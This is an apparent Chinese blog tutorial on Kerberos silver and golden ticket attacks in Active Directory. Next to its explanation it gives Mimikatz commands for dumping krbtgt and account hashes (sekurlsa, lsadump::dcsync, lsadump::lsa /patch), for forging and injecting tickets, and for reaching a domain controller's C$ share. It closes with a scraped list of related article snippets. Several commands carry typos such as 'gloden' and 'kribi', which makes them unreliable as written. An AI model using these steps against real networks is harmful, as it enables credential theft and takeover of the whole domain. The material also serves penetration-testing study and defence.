「Active Directory Sec」白银票据和黄金票据
描述
白银票据: 即伪造的TGS。当获取需要访问的目标服务器NTLM HASH后,就可以利用Mimikatz伪造TGS,直接去访问目标服务器。此过程不需要KDC的参与。但缺点是只能访问一个服务。
黄金票据: 即伪造TGT。当攻击者拥有普通域账户,krbtgt ntlm hash ,域SID时,就可以伪造TGT。拥有黄金票据就拥有了域内所有的访问控制权限。
原理
黄金票据
通过Kerberos的通信过程就可以看出,当攻击者获取krbtgt的HASH值时,就可以利用这个HASH去伪造TGT,票据授予票据,在以后每一次的通信过程中,Client就能利用这个伪造的TGT去获取要访问的Server的TGS。也就是说,伪造了黄金票据,就拥有了域内所有的访问控制权限。
黄金票据的条件
- 域名称
- 域的SID值
- 域的krbtgt账户NTLM HASH
- 伪造用户名
局限
在一个多域AD森林中,如果创建的黄金票据不包含在Enterprise Admin组中,则黄金票据不会向森林中的其他域提供管理权限。在单个域中,由于Enterprise Admin组驻留在此域中,这时黄金票据不存在局限性。
Mimikatz伪造黄金票据、
1.获取winodws域名称
$ systeminfo
2.获取krbtgt和账户信息
mimikatz# sekurlsa::kerberos
mimikatz# sekurlsa::ticket /export
mimikatz# sekurlsa::logonpassword
mimikatz# lsadump::dsync /domain:xxx.xxx.xxx /user:krbtgt
mimikatz# lsadump::lsa /patch -> sid+ntlm
3.生成黄金票据
# 使用krbtgt的hash值:
mimikatz# kerberos::gloden /user:Administrator /domain:xxx.xxx.xxx /sid:xxxxxxxxxxxxx krbtgt:ntlm-hashvlaue /ticket:test.kribi# 使用krbtgt的aes256值:
mimikatz# kerberos::gloden /domain:xxx.xxx /sid:xxxxxxxxxxx /aes256:xxxxxxxx /user:Administrator /ticket:test.kribi
4.使用黄金票据
# 导入票据
mimikatz::ptt test.kribi#检验缓存票据
PS C:\Users\Administrastor> klist #利用票据访问
PS C:\Users\Administrastor> net use \\xx.domain-name
dir \\xx.domain-name\c$
利用dcsync获取hash
从域控制器获取user01的hash
白银票据
从kerberos通信协议来看,在KDC向Client发送TGS时,利用了远程服务器Server和KDC共享的长期秘钥来加密的。也就是说,只要获取了远程服务器Server的NTLM HASH就可以伪造票据。前提是利用其他方式获取需要访问服务器的NTLM HASH。
特点
- 不需要与KDC进行交互
- 需要目标服务的NTLM HASH
Mimikatz 白银票据伪造:
- kerberos::list #列出票据
- kerberos::purge # 清除票据
白银票据的伪造:
mimikatz “kerberos::golden /user:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt” exit
总结
在kerberos认证中,KDC是Client和Server的共同信任第三方,而建立信任的过程中“票据”是信任关系的凭据。但这张凭据的最终生成核心秘钥还是NTLM HASH,获取NTLM HASH之后,就可以伪造票据,达到欺骗
的效果。也可以认为是域内的权限提升。
「Active Directory Sec」白银票据和黄金票据相关推荐
- 域渗透-白银票据和黄金票据的利用
最近做了一些靶场域渗透的实验,记录下一些关于白银票据和黄金票据的问题. 0x01 白银票据的利用 1 环境信息 域控DC 192.168.183.130 域内主机win7 192.168.183.12 ...
- 一文了解黄金票据和白银票据
前言 某老哥的一次面试里问到了这个问题,故来做一番了解 该攻击方式在BlackHat 2014被提出,演讲者为Alva Duckwall & Benjamin Delpy(@gentilkiw ...
- 白银票据/黄金票据构造分析
大家最好在看这篇文章之前,去看下我写的那篇关于认证协议分析的文章:NTLM与kerberos认证体系详解 (下面所说的Server hash指的是服务端机器用户的NTLM hash) 我们的白银票据和 ...
- 域权限维持—黄金票据和白金票据
黄金票据和白金票据 前言 某老哥的一次面试里问到了这个问题,故来做一番了解 该攻击方式在BlackHat 2014被提出,演讲者为Alva Duckwall & Benjamin Delpy( ...
- 利用非约束性委派+Spooler打印机服务 制作黄金票据攻击域控
目录 前言 攻击过程 Rubeus监听 利用打印服务强制让域控机向本机验证身份 提取TGT 注入TGT票据到当前会话并导出域控中所有用户的hash 制作黄金票据 前言 继上一篇 --> 域渗透- ...
- 基于MSF框架下的kiwi模块制作黄金票据
目录 一.kiwi模块使用简介 1.权限问题 2.使用注意事项 3.关于kiwi的命令简介 二.实验过程 1.环境构成 2.实验步骤 三.黄金票据的制作使用 1.制作票据的条件,以及如何获取该条件内容 ...
- Active Directory 证书服务(一)
Active Directory 证书服务(一) 0x00 前言 specterops发布了一篇关于Active Directory 证书服务相关漏洞的白皮书 https://www.spectero ...
- 久等了,「阿里妈妈技术」来啦!
Hi,各位小伙伴,「阿里妈妈技术」正式和大家见面啦~ 我们是谁 我们是阿里巴巴集团核心商业化部门--阿里妈妈的技术团队. 秉承着"让天下没有难做的营销"的使命,阿里妈妈技术引领了A ...
- 撸了一个「合成大西瓜」
最近「合成大西瓜」这个游戏也很火热,玩了一阵还挺有意思的.研究了一下原理,发现目前流传的版本都是魔改编译后的版本,代码经过压缩不具备可读性,因此决定自己照着实现一个.这个游戏已经开源,获取项目可以关注 ...
最新文章
- 关于ASP.NET 中站点地图sitemap 的使用【转xugang】
- 设计模式 ( 十八 ) 策略模式Strategy(对象行为型)
- halcon create_ocr_class_svm 使用SVM分类器创建OCR分类器
- 数字校园项目-学生失联预警系统(二)-----项目部署
- 宅男、游戏、美女,一场不一样的技术公开课让你老泪纵横
- 确保河道环境_扮靓美丽河湖 | 河道保洁“神器”, 上线!
- SQL Server 823,824 错误
- Eureka 控制台参数说明
- kali安卓手机木马远控
- Java基础学习教程,eclipse简单使用教程(Java集成开发工具)
- 计算机本地连接无internet访问权限,ipv4连接无internet访问权限怎么解决
- 先进先出队列,优先级队列以及后进先出队列
- Ubuntu中安装和使用vim
- Congfu Xu's HomePage
- FreeRTOS 使用指南
- 树莓派中文输入法安装
- html中鱼眼效果,鱼眼效果和放大效果怎么做
- HKEY_LOCAL_MACHINE\Software\WOW6432Node
- php获取nginx真实IP,nginx proxy获取用户真实ip
- ios13查找iphone_如何使用iOS 13更快地制作iPhone